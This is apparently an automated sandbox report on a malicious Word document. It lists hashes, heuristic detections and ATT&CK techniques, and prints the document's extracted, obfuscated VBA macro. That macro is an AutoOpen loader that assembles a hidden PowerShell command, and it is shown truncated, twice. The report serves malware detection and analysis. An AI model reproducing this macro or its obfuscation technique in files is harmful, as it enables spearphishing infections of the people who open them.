Office (OLE) malware analysis — malicious · 3f83f98dc636339d

MALICIOUS

Office (OLE)

237.8 KB Created: 2018-07-05 09:58:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: e679f63abdaed4de212ac31bc5b613e7 SHA-1: 92ba51d0583b256752d3ec165d6d5281c4855696 SHA-256: 3f83f98dc636339d2bc5f361b4e3699888f123092f1bacb234e0704be26319f6

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing an obfuscated VBA macro. The AutoOpen macro triggers the execution of a PowerShell command by concatenating strings to form the command: "powershell -nop -w hidden -c \"$sShellid[1] + '$SShellid[13]' + 'X'\" ( ( '103X43>23Q17I126-45Q38j52X110m44-33'". This indicates the document is likely a spearphishing attachment intended to download and execute a second-stage payload.

Heuristics 8

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12889 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12889 bytes
SHA-256: `dea5ec0497f1073351279df4ee064d22cdc73a36966fc1fc4e087ad5da4055a5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "TjSpPTVmMA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next DviKAw = (83353 / IkWns) - 52102 - 87069 DaWzt = (96278 / rhZMrp) - 4900 - 64052 AORLV = (30200 / uhpTS) - 18714 - 33717 KjVsZS = (92160 / RCApa) - 9177 - 34667 OVXSBbFTzTb (PJpwSu + dzUYtKDd + UIosqizH) GEDNH = (64017 / HDLId) - 46921 - 45172 qbfoQ = (65607 / BstiO) - 52864 - 98959 End Sub Attribute VB_Name = "dhMFmfjjsJdWf" Function PJpwSu() On Error Resume Next OLlGdO = (sJhKV * 91514 * 90914 + MwMCw - 7750 - YwiOsQ * TvfPUo / WWRzn * (bHczm + Sviwi - 36918 * lmnXO)) jTZIOC = ONlBw - lzzGQ + uDdHdv / 23046 + zkpnT - UUHfLl AqmfGb = (kqZvF * 20114 * 98731 + RWkcT - 97103 - kwwvwC * jwDbnE / UzrKSh * (IDdIW + VQnmCB - 7586 * piKdE)) QjRTQw = "wers" + "hell" + " " + " " + " ." + Chr(40) + " $SHe" + "llid[1" nntuhT = (zDkaQ * 94066 * 46338 + nBizK - 60430 - hJSkuB * iHhijN / TjPwVB * (KOwdji + kjLBF - 18216 * jcwYz)) AiRvp = (ZCqsql * 55890 * 16189 + TDrIv - 96133 - OrnidA * iOPDF / iwjWs * (GzRpJ + vHhfP - 9371 * NXPaHK)) rdWvRw = (sRBQr * 53955 * 86732 + nbUJS - 21851 - YmAfi * hhNcw / LzmbRZ * (uUAkMd + PXBjvo - 30071 * EkvmRK)) cshNK = (USSCo * 56628 * 95237 + vTGOT - 47894 - YWhiDr * GSYWiI / VRQVdn * (QINbL + oIpJfu - 57348 * VAiHN)) PCqwPKMT = "]" + Chr(43) + "$sHe" + "llid[1" + "3]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + Chr(40) + " '1" + "03X43" + ">23Q17I12" + "6-45Q" + "38j5" + "2X11" + "0m44-33" zJjpW = (ImDAiU * 47411 * 90093 + WGVww - 94710 - iCJRnJ * HzDCI / lFSAI * (mZjzL + JZsNKA - 49070 * BijfE)) HdaiXs = (XWVQjr * 56623 * 94179 + idisi - 6279 - LOrsOV * LjqUr / PadDXK * (uoIWt + Ychdj - 6221 * iPTfz)) mwCbSP = (TRnUqm * 20937 * 43730 + DzmdkH - 87860 - DcEJHY * vJKAdd / tOZGb * (pJntij + iRVOiC - 30801 * qLaMs)) bZiDTijC = "Q41j38k3" + "2m55" + "X99A13-38" + "j55,109" + "I20j3" + "8,33,0>4" + "7Q42>38>4" + "5Q55Q1" + "20m1" + "03k41-0," + "54A126" + ">100" tjQdct = (wbjWK * 44562 * 82772 + VBDCIk - 59323 - ifuRF * bYMAB / mNXXDW * (TMXUR + LKARCb - 24312 * Lizib)) bKtUfE = (DdfTw * 87029 * 79326 + iauEd - 76965 - VaNzCD * tiaQcL / lLzdtR * (wjTiBz + lwvvtf - 78237 * GfCUF)) YtdqQBPVtu = "k43-55>5" + "5j51X121," + "108m10" + "8-52,5" + "2m52Q109" + ">34,4" + "8,42" + "A37X3" bErXZM = (HwzjOp * 7843 * 8634 + FjLYX - 18367 - ipwzsw * aPCWc / ujQRK * (XmZXaS + iuAVA - 19632 * RIhcM)) ZipCpz = (BFQpoH * 95029 * 84371 + Pcikm - 69370 - ZjpTOj * zZwRv / ljuji * (JppnoV + FtimB - 5029 * vQTzjY)) LJJVA = (Hijwl * 67584 * 21692 + LKcpt - 14639 - HJZoba * ZobMWS / NLvbD * (WlDpd + DWmGm - 30798 * ZEAkj)) lZRLT = (mbYSuO * 51717 * 72870 + JRWjX - 27674 - ZtCMK * lzoEL / mNHMGr * (HVhbmj + QzPFfb - 92353 * zXJHR)) IYLamGbFsEf = "4Q33Q42I" + "43I109m" + "32k44" + "k46A108I4" + "1>57" + "m44m108" + "Q3I4" + "3A55A55A" + "51A121k" + "108j1" WKBAi = (GvYwzC * 83548 * 14733 + twRosM - 52708 - waYnMw * pvDvi / VzEdj * (YizXDX + WqhMQ - 12363 * OCaFzt)) EcOjZ = (vwHcN * 39553 * 67947 + Znhizs - 23316 - wOtia * TZOBC / uPFVfb * (ztvWPV + YNnbIz - 94234 * izmqpl)) QrpBo = (jiwFpa * 88678 * 68382 + AwGiJU - 74967 - PGIVQv * FfGYZv / TTYNwo * (NPAjWw + Rntwdw - 49448 * fLQnwA)) JDwvc = (XzNKM * 28621 * 6403 + BCVPp - 50741 - Hjnpk * TWwdm / IVtZHv * (wrUBE + rwAYjk - 8963 * wBUKG)) AlOdCI = "08A52X52X" + "52X109I" + "39m42k48k" + "51X44k5" + "7A42A32Q4" + "2A41j34" + "I109m5" + "3>42X" + "34Q46X38" + ">39X4" + "2m34m109" PJpwSu = QjRTQw + PCqwPKMT + bZiDTijC + YtdqQBPVtu + IYLamGbFsEf + AlOdCI OVijiO = (aKOGz * 28810 * 90803 + zaKbI - 99015 - Gqhvp * DwJDQu / FXczwf * (lMNQYi + cCEHd - 81111 * OswiZ)) MSmhK = (LDVwMZ * 5727 * 86152 + MdkFmn - 86249 - zHlGi * mKWKhJ / iPOfbY * (DkMbGI + LBXwaT - 30105 * ZYccOj)) MECiT = (EbzLfd * 5496 * 55317 + dRXKba - 91428 - vnEwq * iQWwZY / KiE ... (truncated)

SHA-256: dea5ec0497f1073351279df4ee064d22cdc73a36966fc1fc4e087ad5da4055a5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "TjSpPTVmMA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   DviKAw = (83353 / IkWns) - 52102 - 87069
   DaWzt = (96278 / rhZMrp) - 4900 - 64052
   AORLV = (30200 / uhpTS) - 18714 - 33717
   KjVsZS = (92160 / RCApa) - 9177 - 34667
OVXSBbFTzTb (PJpwSu + dzUYtKDd + UIosqizH)
   GEDNH = (64017 / HDLId) - 46921 - 45172
   qbfoQ = (65607 / BstiO) - 52864 - 98959
End Sub


Attribute VB_Name = "dhMFmfjjsJdWf"
Function PJpwSu()
On Error Resume Next
OLlGdO = (sJhKV * 91514 * 90914 + MwMCw - 7750 - YwiOsQ * TvfPUo / WWRzn * (bHczm + Sviwi - 36918 * lmnXO))
   jTZIOC = ONlBw - lzzGQ + uDdHdv / 23046 + zkpnT - UUHfLl
   AqmfGb = (kqZvF * 20114 * 98731 + RWkcT - 97103 - kwwvwC * jwDbnE / UzrKSh * (IDdIW + VQnmCB - 7586 * piKdE))
QjRTQw = "wers" + "hell" + "       " + "     " + "      ." + Chr(40) + " $SHe" + "llid[1"
nntuhT = (zDkaQ * 94066 * 46338 + nBizK - 60430 - hJSkuB * iHhijN / TjPwVB * (KOwdji + kjLBF - 18216 * jcwYz))
   AiRvp = (ZCqsql * 55890 * 16189 + TDrIv - 96133 - OrnidA * iOPDF / iwjWs * (GzRpJ + vHhfP - 9371 * NXPaHK))
   rdWvRw = (sRBQr * 53955 * 86732 + nbUJS - 21851 - YmAfi * hhNcw / LzmbRZ * (uUAkMd + PXBjvo - 30071 * EkvmRK))
   cshNK = (USSCo * 56628 * 95237 + vTGOT - 47894 - YWhiDr * GSYWiI / VRQVdn * (QINbL + oIpJfu - 57348 * VAiHN))
PCqwPKMT = "]" + Chr(43) + "$sHe" + "llid[1" + "3]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + Chr(40) + " '1" + "03X43" + ">23Q17I12" + "6-45Q" + "38j5" + "2X11" + "0m44-33"
zJjpW = (ImDAiU * 47411 * 90093 + WGVww - 94710 - iCJRnJ * HzDCI / lFSAI * (mZjzL + JZsNKA - 49070 * BijfE))
   HdaiXs = (XWVQjr * 56623 * 94179 + idisi - 6279 - LOrsOV * LjqUr / PadDXK * (uoIWt + Ychdj - 6221 * iPTfz))
   mwCbSP = (TRnUqm * 20937 * 43730 + DzmdkH - 87860 - DcEJHY * vJKAdd / tOZGb * (pJntij + iRVOiC - 30801 * qLaMs))
bZiDTijC = "Q41j38k3" + "2m55" + "X99A13-38" + "j55,109" + "I20j3" + "8,33,0>4" + "7Q42>38>4" + "5Q55Q1" + "20m1" + "03k41-0," + "54A126" + ">100"
tjQdct = (wbjWK * 44562 * 82772 + VBDCIk - 59323 - ifuRF * bYMAB / mNXXDW * (TMXUR + LKARCb - 24312 * Lizib))
   bKtUfE = (DdfTw * 87029 * 79326 + iauEd - 76965 - VaNzCD * tiaQcL / lLzdtR * (wjTiBz + lwvvtf - 78237 * GfCUF))
YtdqQBPVtu = "k43-55>5" + "5j51X121," + "108m10" + "8-52,5" + "2m52Q109" + ">34,4" + "8,42" + "A37X3"
bErXZM = (HwzjOp * 7843 * 8634 + FjLYX - 18367 - ipwzsw * aPCWc / ujQRK * (XmZXaS + iuAVA - 19632 * RIhcM))
   ZipCpz = (BFQpoH * 95029 * 84371 + Pcikm - 69370 - ZjpTOj * zZwRv / ljuji * (JppnoV + FtimB - 5029 * vQTzjY))
   LJJVA = (Hijwl * 67584 * 21692 + LKcpt - 14639 - HJZoba * ZobMWS / NLvbD * (WlDpd + DWmGm - 30798 * ZEAkj))
   lZRLT = (mbYSuO * 51717 * 72870 + JRWjX - 27674 - ZtCMK * lzoEL / mNHMGr * (HVhbmj + QzPFfb - 92353 * zXJHR))
IYLamGbFsEf = "4Q33Q42I" + "43I109m" + "32k44" + "k46A108I4" + "1>57" + "m44m108" + "Q3I4" + "3A55A55A" + "51A121k" + "108j1"
WKBAi = (GvYwzC * 83548 * 14733 + twRosM - 52708 - waYnMw * pvDvi / VzEdj * (YizXDX + WqhMQ - 12363 * OCaFzt))
   EcOjZ = (vwHcN * 39553 * 67947 + Znhizs - 23316 - wOtia * TZOBC / uPFVfb * (ztvWPV + YNnbIz - 94234 * izmqpl))
   QrpBo = (jiwFpa * 88678 * 68382 + AwGiJU - 74967 - PGIVQv * FfGYZv / TTYNwo * (NPAjWw + Rntwdw - 49448 * fLQnwA))
   JDwvc = (XzNKM * 28621 * 6403 + BCVPp - 50741 - Hjnpk * TWwdm / IVtZHv * (wrUBE + rwAYjk - 8963 * wBUKG))
AlOdCI = "08A52X52X" + "52X109I" + "39m42k48k" + "51X44k5" + "7A42A32Q4" + "2A41j34" + "I109m5" + "3>42X" + "34Q46X38" + ">39X4" + "2m34m109"
PJpwSu = QjRTQw + PCqwPKMT + bZiDTijC + YtdqQBPVtu + IYLamGbFsEf + AlOdCI
   OVijiO = (aKOGz * 28810 * 90803 + zaKbI - 99015 - Gqhvp * DwJDQu / FXczwf * (lMNQYi + cCEHd - 81111 * OswiZ))
   MSmhK = (LDVwMZ * 5727 * 86152 + MdkFmn - 86249 - zHlGi * mKWKhJ / iPOfbY * (DkMbGI + LBXwaT - 30105 * ZYccOj))
   MECiT = (EbzLfd * 5496 * 55317 + dRXKba - 91428 - vnEwq * iQWwZY / KiE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.